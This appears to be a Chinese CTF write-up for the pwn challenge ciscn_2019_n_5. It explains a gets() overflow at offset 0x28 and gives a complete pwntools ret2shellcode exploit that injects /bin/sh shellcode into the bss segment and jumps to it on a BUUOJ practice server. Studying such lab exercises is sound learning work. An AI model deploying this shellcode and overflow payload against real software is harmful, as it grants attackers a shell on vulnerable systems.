ciscn_2019_n_5

Checksec:

没开任何保护

Ida:

Read函数先将我们的输入写入bss段,然后再次调用gets函数存在溢出、offest=0x28

所以这题就是很标准的ret2shellcode:

构造exp:

from pwn import*
context(arch="amd64",log_level='debug',os='linux',terminal = ['tmux', 'sp', '-h'])
r=remote("node4.buuoj.cn",29164)
shell=asm(shellcraft.sh())
shell1="\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
shell_addr=0x601080
payload=flat("a"*0x28)+p64(shell_addr)
r.recvuntil("name")
r.sendline(shell)
r.recvuntil("me?")
r.sendline(payload)
r.interactive()

Flag:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值